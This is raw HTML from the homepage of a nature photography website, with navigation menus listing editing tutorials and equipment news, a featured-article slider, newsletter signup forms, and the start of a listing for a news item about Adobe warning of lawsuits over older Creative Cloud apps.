ubermenu-item-6392 ubermenu-item-6392-post-12906 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/best-hashtags-nature-photography-instagram/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2018/10/best-hashtags-nature-photography-instagram-560x370.jpg" width="560" height="370" alt="best hashtags for nature photography on instagram" /><span class="ubermenu-target-title ubermenu-target-text">The Best Hashtags for Nature Photography on Instagram</span></a></li></ul></li></ul></li><li id="menu-item-732" class="ubermenu-tab ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-732 ubermenu-item-auto ubermenu-column ubermenu-column-full ubermenu-has-submenu-drop" data-ubermenu-trigger="mouseover"><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="/equipment/equipment-news/"><span class="ubermenu-target-title ubermenu-target-text">News</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul class="ubermenu-tab-content-panel ubermenu-column ubermenu-column-3-4 ubermenu-submenu ubermenu-submenu-id-732 ubermenu-submenu-type-tab-content-panel"><li class=" ubermenu-autocolumn menu-item-736-col-0 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-736-col-0"><ul class="ubermenu-submenu ubermenu-submenu-id-736-col-0 ubermenu-submenu-type-stack"><li id="menu-item-736-post-14723" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-736 ubermenu-item-736-post-14723 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/laowa-100mm-f-2-8-ultra-macro-offers-extreme-21-ratio/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2019/05/laowa-100mm-9-560x370.jpg" width="560" height="370" alt="laowa-100mm &#8211; 9" /><span class="ubermenu-target-title ubermenu-target-text">Laowa 100mm F/2.8 &#8216;Ultra Macro&#8217; Offers Extreme 2:1 Ratio</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-736-col-1 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-736-col-1"><ul class="ubermenu-submenu ubermenu-submenu-id-736-col-1 ubermenu-submenu-type-stack"><li id="menu-item-736-post-14649" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-736 ubermenu-item-736-post-14649 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/sonys-new-animal-eye-af-makes-tracking-wildlife-easier/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2019/05/eye-animal-1-1-560x370.jpg" width="560" height="370" alt="eye-animal &#8211; 1 (1)" /><span class="ubermenu-target-title ubermenu-target-text">Sony&#8217;s New Animal Eye AF Makes Tracking Wildlife Easier</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-736-col-2 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-736-col-2"><ul class="ubermenu-submenu ubermenu-submenu-id-736-col-2 ubermenu-submenu-type-stack"><li id="menu-item-736-post-14582" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-736 ubermenu-item-736-post-14582 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/camtraptions-unveils-new-weather-sealed-camera-housing/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2019/04/cam-trap-housing-1-560x370.jpg" width="560" height="370" alt="cam-trap-housing &#8211; 1" /><span class="ubermenu-target-title ubermenu-target-text">Camtraptions Unveils New Weather-Sealed Camera Housing</span></a></li></ul></li></ul></li><li id="menu-item-7242" class="ubermenu-tab ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-7242 ubermenu-item-auto ubermenu-column ubermenu-column-full"><a class="ubermenu-target ubermenu-target-with-icon ubermenu-item-layout-default ubermenu-item-layout-icon_left all-menu-link" href="/equipment"><i class="ubermenu-icon fas fa-cog"></i><span class="ubermenu-target-title ubermenu-target-text">All Equipment</span></a></li></ul></li></ul></li><li id="menu-item-6385" class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-has-children ubermenu-item-6385 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-drop ubermenu-has-submenu-mega"><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only ubermenu-noindicator" href="https://www.naturettl.com/postproduction/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Post Production</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-6385 ubermenu-submenu-type-auto ubermenu-submenu-type-mega ubermenu-submenu-drop ubermenu-submenu-align-full_width"><li id="menu-item-6409" class="ubermenu-item ubermenu-tabs ubermenu-item-6409 ubermenu-item-level-1 ubermenu-column ubermenu-column-full ubermenu-tab-layout-left ubermenu-tabs-show-default ubermenu-tabs-show-current"><ul class="ubermenu-tabs-group ubermenu-column ubermenu-column-1-4 ubermenu-submenu ubermenu-submenu-id-6409 ubermenu-submenu-type-auto ubermenu-submenu-type-tabs-group"><li id="menu-item-6411" class="ubermenu-tab ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-6411 ubermenu-item-auto ubermenu-column ubermenu-column-full ubermenu-has-submenu-drop" data-ubermenu-trigger="mouseover"><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="/postproduction/lightroom/"><span class="ubermenu-target-title ubermenu-target-text">Lightroom</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul class="ubermenu-tab-content-panel ubermenu-column ubermenu-column-3-4 ubermenu-submenu ubermenu-submenu-id-6411 ubermenu-submenu-type-tab-content-panel"><li class=" ubermenu-autocolumn menu-item-6414-col-0 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6414-col-0"><ul class="ubermenu-submenu ubermenu-submenu-id-6414-col-0 ubermenu-submenu-type-stack"><li id="menu-item-6414-post-12318" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6414 ubermenu-item-6414-post-12318 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/how-to-post-photos-to-instagram-from-lightroom/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2018/08/upload-photos-instagram-lightroom-tutorial-1-560x370.jpg" width="560" height="370" alt="upload photos to instagram from lightroom" /><span class="ubermenu-target-title ubermenu-target-text">How to Post Photos to Instagram from Lightroom</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-6414-col-1 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6414-col-1"><ul class="ubermenu-submenu ubermenu-submenu-id-6414-col-1 ubermenu-submenu-type-stack"><li id="menu-item-6414-post-10743" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6414 ubermenu-item-6414-post-10743 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/5-mistakes-to-avoid-when-processing-star-photos/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2018/01/star-photos-processing-mistakes-560x370.jpg" width="560" height="370" alt="star-photos-processing-mistakes" /><span class="ubermenu-target-title ubermenu-target-text">5 Mistakes to Avoid When Processing Star Photos</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-6414-col-2 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6414-col-2"><ul class="ubermenu-submenu ubermenu-submenu-id-6414-col-2 ubermenu-submenu-type-stack"><li id="menu-item-6414-post-10512" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6414 ubermenu-item-6414-post-10512 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/export-png-files-lightroom/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2017/12/lightroom-png-export-lead-560x370.jpg" width="560" height="370" alt="lightroom png export" /><span class="ubermenu-target-title ubermenu-target-text">How to Export PNG Files from Lightroom Classic CC</span></a></li></ul></li></ul></li><li id="menu-item-6412" class="ubermenu-tab ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-6412 ubermenu-item-auto ubermenu-column ubermenu-column-full ubermenu-has-submenu-drop" data-ubermenu-trigger="mouseover"><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="/postproduction/photoshop/"><span class="ubermenu-target-title ubermenu-target-text">Photoshop</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul class="ubermenu-tab-content-panel ubermenu-column ubermenu-column-3-4 ubermenu-submenu ubermenu-submenu-id-6412 ubermenu-submenu-type-tab-content-panel"><li class=" ubermenu-autocolumn menu-item-6415-col-0 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6415-col-0"><ul class="ubermenu-submenu ubermenu-submenu-id-6415-col-0 ubermenu-submenu-type-stack"><li id="menu-item-6415-post-13221" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6415 ubermenu-item-6415-post-13221 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/how-to-perfectly-post-process-your-woodland-images/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2018/11/heaton-orton-effect4-560x370.jpg" width="560" height="370" alt="heaton-orton-effect4" /><span class="ubermenu-target-title ubermenu-target-text">How to Process Woodland Photos with the Orton Effect</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-6415-col-1 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6415-col-1"><ul class="ubermenu-submenu ubermenu-submenu-id-6415-col-1 ubermenu-submenu-type-stack"><li id="menu-item-6415-post-10664" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6415 ubermenu-item-6415-post-10664 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/stack-star-photos-reduce-noise-photoshop/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2018/01/stack-stars-Final-560x370.jpg" width="560" height="370" alt="star photo stacking" /><span class="ubermenu-target-title ubermenu-target-text">How to Stack Star Photos to Reduce Noise in Photoshop</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-6415-col-2 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6415-col-2"><ul class="ubermenu-submenu ubermenu-submenu-id-6415-col-2 ubermenu-submenu-type-stack"><li id="menu-item-6415-post-8916" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6415 ubermenu-item-6415-post-8916 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/make-pop-nature-photo-photoshop/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2017/07/final-2-560x370.jpg" srcset="https://www.naturettl.com/wp-content/uploads/2017/07/final-2-560x370.jpg 560w, https://www.naturettl.com/wp-content/uploads/2017/07/final-2-300x198.jpg 300w, https://www.naturettl.com/wp-content/uploads/2017/07/final-2-768x507.jpg 768w, https://www.naturettl.com/wp-content/uploads/2017/07/final-2-1024x676.jpg 1024w, https://www.naturettl.com/wp-content/uploads/2017/07/final-2-800x529.jpg 800w, https://www.naturettl.com/wp-content/uploads/2017/07/final-2-550x363.jpg 550w, https://www.naturettl.com/wp-content/uploads/2017/07/final-2-900x595.jpg 900w, https://www.naturettl.com/wp-content/uploads/2017/07/final-2.jpg 1600w" sizes="(max-width: 560px) 100vw, 560px" width="560" height="370" alt="final-2" /><span class="ubermenu-target-title ubermenu-target-text">How to Make a Pop-up Nature Photo in Photoshop</span></a></li></ul></li></ul></li><li id="menu-item-10992" class="ubermenu-tab ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-10992 ubermenu-item-auto ubermenu-column ubermenu-column-full ubermenu-has-submenu-drop" data-ubermenu-trigger="mouseover"><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="/postproduction/luminar/"><span class="ubermenu-target-title ubermenu-target-text">Luminar 3</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul class="ubermenu-tab-content-panel ubermenu-column ubermenu-column-3-4 ubermenu-submenu ubermenu-submenu-id-10992 ubermenu-submenu-type-tab-content-panel"><li class=" ubermenu-autocolumn menu-item-10993-col-0 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-10993-col-0"><ul class="ubermenu-submenu ubermenu-submenu-id-10993-col-0 ubermenu-submenu-type-stack"><li id="menu-item-10993-post-11233" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-10993 ubermenu-item-10993-post-11233 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/reduce-noise-luminar-2018/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2018/02/reduce-noise-luminar-2018-lead-560x370.jpg" width="560" height="370" alt="how to reduce noise luminar 2018" /><span class="ubermenu-target-title ubermenu-target-text">How to Selectively Reduce Noise in Luminar 2018 &#038; Luminar 3</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-10993-col-1 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-10993-col-1"><ul class="ubermenu-submenu ubermenu-submenu-id-10993-col-1 ubermenu-submenu-type-stack"><li id="menu-item-10993-post-11052" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-10993 ubermenu-item-10993-post-11052 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/how-to-sharpen-photos-in-luminar-2018/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2018/02/sharpen-luminar-2018-560x370.jpg" width="560" height="370" alt="sharpen-luminar-2018" /><span class="ubermenu-target-title ubermenu-target-text">How to Sharpen Photos in Luminar 2018 &#038; Luminar 3</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-10993-col-2 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-10993-col-2"><ul class="ubermenu-submenu ubermenu-submenu-id-10993-col-2 ubermenu-submenu-type-stack"><li id="menu-item-10993-post-10973" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-10993 ubermenu-item-10993-post-10973 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/edit-process-raw-photos-luminar-2018/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2018/01/luminar-2018-edit-raw-photos-lead-560x370.jpg" width="560" height="370" alt="luminar-2018-edit-raw-photos-lead" /><span class="ubermenu-target-title ubermenu-target-text">How to Edit and Process Raw Photos in Luminar 2018 &#038; Luminar 3</span></a></li></ul></li></ul></li><li id="menu-item-7243" class="ubermenu-tab ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-7243 ubermenu-item-auto ubermenu-column ubermenu-column-full"><a class="ubermenu-target ubermenu-target-with-icon ubermenu-item-layout-default ubermenu-item-layout-icon_left all-menu-link" href="/postproduction"><i class="ubermenu-icon fas fa-desktop"></i><span class="ubermenu-target-title ubermenu-target-text">All Post Production</span></a></li></ul></li></ul></li><li id="menu-item-730" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-730 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only ubermenu-noindicator" href="/shop/ebooks/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">eBooks</span></a></li><li id="menu-item-12091" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-12091 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="/hub/?utm_source=blog&#038;utm_medium=referral&#038;utm_campaign=menu" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Photo Travel Hub</span></a></li></ul></nav> </div> </div> <div class="col-xs-6 col-sm-2 col-sm-offset-8 col-md-offset-0 col-md-1 Site-header__flex text-right"> <button class="btn-link Site-header__button hidden-xs" id="search-button"><i class="fa fa-search"></i></button> <button id="toggle-nav" class="btn-link Site-header__button"><i class="fa fa-bars"></i></button> </div> </div> </div> <div id="search-container"> <div class="container"> <div class="row"> <div class="col-sm-11"> <form action="/" class="search-form"> <input type="text" name="s" class="_input" placeholder="What are you looking for?"> <button type="submit" class="_button">Search</button> </form> </div> <div class="col-sm-1"> <button id="close-search" class="btn btn-link"><i class="search-close"></i></button> </div> </div> </div> </div> </header> <main class="main" role="main"> <section class="Hero Hero--dark Hero--homepage"> <div class="container"> <div class="Hero__slider"> <div class="swiper-wrapper"> <div class="_slide swiper-slide"> <a href="https://www.naturettl.com/how-to-photograph-bluebells/"> <img src="https://www.naturettl.com/wp-content/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://www.naturettl.com/wp-content/uploads/2019/05/photograph-bluebells-11-1600x805.jpg" width="1600" height="805" class="img-responsive _slide__image wp-post-image" alt data-wp-pid="14634" nopin="nopin"><noscript><img width="1600" height="805" src="https://www.naturettl.com/wp-content/uploads/2019/05/photograph-bluebells-11-1600x805.jpg" class="img-responsive _slide__image wp-post-image" alt="" data-wp-pid="14634" nopin="nopin" /></noscript> </a> <div class="_slide__content"> <div class="row"> <div class="col-sm-10 col-sm-offset-1"> <ul class="_slide__byline"> <li><a href="/category/featured" class="_category">Featured</a></li> <li><a href="https://www.naturettl.com/author/david-chapman/" class="_author">David Chapman</a></li> </ul> <h1 class="_slide__title"><a href="https://www.naturettl.com/how-to-photograph-bluebells/">How to Photograph Bluebells</a></h1> </div> </div> </div> <div class="_slide__navigation"> <div class="slider-hero-next"> <i class="fa fa-angle-right"></i> </div> <div class="_line"></div> <div class="slider-hero-previous"> <i class="fa fa-angle-left"></i> </div> </div> </div> <div class="_slide swiper-slide"> <a href="https://www.naturettl.com/photograph-spring-landscapes/"> <img src="https://www.naturettl.com/wp-content/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://www.naturettl.com/wp-content/uploads/2019/02/photograph-spring-landscapes-6-1600x805.jpg" width="1600" height="805" class="img-responsive _slide__image wp-post-image" alt="photograph-spring-landscapes" data-wp-pid="13945" nopin="nopin"><noscript><img width="1600" height="805" src="https://www.naturettl.com/wp-content/uploads/2019/02/photograph-spring-landscapes-6-1600x805.jpg" class="img-responsive _slide__image wp-post-image" alt="photograph-spring-landscapes" data-wp-pid="13945" nopin="nopin" /></noscript> </a> <div class="_slide__content"> <div class="row"> <div class="col-sm-10 col-sm-offset-1"> <ul class="_slide__byline"> <li><a href="/category/landscape-tutorials" class="_category">Landscape</a></li> <li><a href="https://www.naturettl.com/author/ross-hoddinott/" class="_author">Ross Hoddinott</a></li> </ul> <h1 class="_slide__title"><a href="https://www.naturettl.com/photograph-spring-landscapes/">How to Photograph Spring Landscapes</a></h1> </div> </div> </div> <div class="_slide__navigation"> <div class="slider-hero-next"> <i class="fa fa-angle-right"></i> </div> <div class="_line"></div> <div class="slider-hero-previous"> <i class="fa fa-angle-left"></i> </div> </div> </div> <div class="_slide swiper-slide"> <a href="https://www.naturettl.com/photograph-lunar-eclipse/"> <img src="https://www.naturettl.com/wp-content/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://www.naturettl.com/wp-content/uploads/2019/02/photograph-lunar-eclipse-8-1600x805.jpg" width="1600" height="805" class="img-responsive _slide__image wp-post-image" alt data-wp-pid="14042" nopin="nopin"><noscript><img width="1600" height="805" src="https://www.naturettl.com/wp-content/uploads/2019/02/photograph-lunar-eclipse-8-1600x805.jpg" class="img-responsive _slide__image wp-post-image" alt="" data-wp-pid="14042" nopin="nopin" /></noscript> </a> <div class="_slide__content"> <div class="row"> <div class="col-sm-10 col-sm-offset-1"> <ul class="_slide__byline"> <li><a href="/category/featured" class="_category">Featured</a></li> <li><a href="https://www.naturettl.com/author/miles-morgan/" class="_author">Miles Morgan</a></li> </ul> <h1 class="_slide__title"><a href="https://www.naturettl.com/photograph-lunar-eclipse/">How to Photograph a Lunar Eclipse</a></h1> </div> </div> </div> <div class="_slide__navigation"> <div class="slider-hero-next"> <i class="fa fa-angle-right"></i> </div> <div class="_line"></div> <div class="slider-hero-previous"> <i class="fa fa-angle-left"></i> </div> </div> </div> </div> </div> </div> </section><div class="container"> <section class="newsletter"> <div class="row no-gutter-xs"> <div class="col-md-7 hidden-xs"> <div class="newsletter__signup"> <div class="col-sm-2"> <img src="https://www.naturettl.com/wp-content/themes/naturettl/dist/images/icons/ico_newsletter.png" width="40" alt="Newsletter" class="_envelope-icon"> </div> <div class="col-sm-6"> <h4 class="_title">Join our newsletter</h4> <p class="_subtitle">Never miss out on world-class tutorials</p> </div> <div class="col-sm-4" style="padding-top:20px;"> <div role="form" class="wpcf7" id="wpcf7-f6609-o1" lang="en-GB" dir="ltr"> <div class="screen-reader-response"></div> <form action="/#wpcf7-f6609-o1" method="post" class="wpcf7-form _form mailchimp-ext-0.4.51" novalidate="novalidate"> <div style="display: none;"> <input type="hidden" name="_wpcf7" value="6609" /> <input type="hidden" name="_wpcf7_version" value="5.1.1" /> <input type="hidden" name="_wpcf7_locale" value="en_GB" /> <input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f6609-o1" /> <input type="hidden" name="_wpcf7_container_post" value="0" /> <input type="hidden" name="g-recaptcha-response" value="" /> </div> <div class="_input-wrap"> <span class="wpcf7-form-control-wrap email"><input type="email" name="email" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email _input" aria-required="true" aria-invalid="false" placeholder="Your E-mail" /></span><br /> <input type="submit" value="&gt;" class="wpcf7-form-control wpcf7-submit _btn" /> </div> <div class="wpcf7-response-output wpcf7-display-none"></div><p style="display: none !important"><span class="wpcf7-form-control-wrap referer-page"><input type="hidden" name="referer-page" value="direct visit" class="wpcf7-form-control wpcf7-text referer-page" aria-invalid="false"></span></p> </form></div> </div> </div> </div> <div class="visible-xs col-xs-12"> <div class="newsletter__signup newsletter__signup--mobile"> <div role="form" class="wpcf7" id="wpcf7-f6609-o2" lang="en-GB" dir="ltr"> <div class="screen-reader-response"></div> <form action="/#wpcf7-f6609-o2" method="post" class="wpcf7-form _form mailchimp-ext-0.4.51" novalidate="novalidate"> <div style="display: none;"> <input type="hidden" name="_wpcf7" value="6609" /> <input type="hidden" name="_wpcf7_version" value="5.1.1" /> <input type="hidden" name="_wpcf7_locale" value="en_GB" /> <input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f6609-o2" /> <input type="hidden" name="_wpcf7_container_post" value="0" /> <input type="hidden" name="g-recaptcha-response" value="" /> </div> <div class="_input-wrap"> <span class="wpcf7-form-control-wrap email"><input type="email" name="email" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email _input" aria-required="true" aria-invalid="false" placeholder="Your E-mail" /></span><br /> <input type="submit" value="&gt;" class="wpcf7-form-control wpcf7-submit _btn" /> </div> <div class="wpcf7-response-output wpcf7-display-none"></div><p style="display: none !important"><span class="wpcf7-form-control-wrap referer-page"><input type="hidden" name="referer-page" value="direct visit" class="wpcf7-form-control wpcf7-text referer-page" aria-invalid="false"></span></p> </form></div> </div> </div> <div class="col-md-5 col-xs-12"> <div class="newsletter__social"> <p class="_title hidden-xs">Follow us<br>on social media</p> <ul class="list-inline _social_list"> <li><a href="https://twitter.com/naturettl" target="_blank"><i class="fa fa-twitter"></i> 5k</a></li> <li><a href="https://facebook.com/naturettl" target="_blank"><i class="fa fa-facebook"></i> 30k</a></li> <li><a href="http://youtube.com/naturettl" target="_blank"><i class="fa fa-youtube"></i></a></li> </ul> </div> </div> </div> </section> </div> <div class="container"> <div class="row"> <div class="col-md-8 col-sm-12"> <article class="post post--listing"> <div class="row"> <div class="col-sm-5 col-xs-12"> <a href="https://www.naturettl.com/adobe-warns-of-lawsuits-for-using-older-cc-apps/"> <img src="https://www.naturettl.com/wp-content/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://www.naturettl.com/wp-content/uploads/2019/05/adobe-sue-1-800x600.jpg" width="800" height="600" class="img-responsive wp-post-image" alt srcset="https://www.naturettl.com/wp-content/uploads/2019/05/adobe-sue-1-800x600.jpg 800w, https://www.naturettl.com/wp-content/uploads/2019/05/adobe-sue-1-400x300.jpg 400w" sizes="(max-width: 800px) 100vw, 800px" data-wp-pid="14782" nopin="nopin"><noscript><img width="800" height="600" src="https://www.naturettl.com/wp-content/uploads/2019/05/adobe-sue-1-800x600.jpg" class="img-responsive wp-post-image" alt="" srcset="https://www.naturettl.com/wp-content/uploads/2019/05/adobe-sue-1-800x600.jpg 800w, https://www.naturettl.com/wp-content/uploads/2019/05/adobe-sue-1-400x300.jpg 400w" sizes="(max-width: 800px) 100vw, 800px" data-wp-pid="14782" nopin="nopin" /></noscript> </a> </div> <div class="col-sm-6 col-xs-12"> <div class="post__mobile-wrap"> <ul class="post__categories list-inline"> <li><a href="/category/general">General</a></li> <li><a href="/category/news">News</a></li> </ul> <h2 class="post__title"><a href='https://www.naturettl.com/adobe-warns-of-lawsuits-for-using-older-cc-apps/'>Adobe Warns of Lawsuits for Using Older CC Apps</a></h2> <div class="post__description"> <p>Software developer Adobe announced that versions prior to the latest two major updates of their popular subscription apps...</p> </div> <footer class="post__footer"> <div class="row"> <div class="col-xs-12 col-sm-10"> <ul class="post__byline list-inline"> <li><i class="fa fa-flag"></i> <a href="https://www.naturettl.com/author/ed-carr/">Ed Carr</a></li> <li><i class="fa fa-comment green"></i> <a href="https://www.naturettl.com/adobe-warns-of-lawsuits-for-using-older-cc-apps/#disqus_thread" class="_comments disqus-comment-count">Comment</a></li> </ul> </div> </div> </footer> </div> </div> <div class="post__social hidden-xs" id="post-social-14781"> <div class="_icons post-social-icons"> <div class="essb_links essb_counter_modern_right essb_displayed_shortcode essb_share essb_template_dark-retina essb_1230262843 print-no" id="essb_displayed_shortcode_1230262843" data-essb-postid="14781" data-essb-position="shortcode" data-essb-button-style="icon" data-essb-template="dark-retina" data-essb-counter-pos="right" data-essb-url="https://www.naturettl.com/adobe-warns-of-lawsuits-for-using-older-cc-apps/" 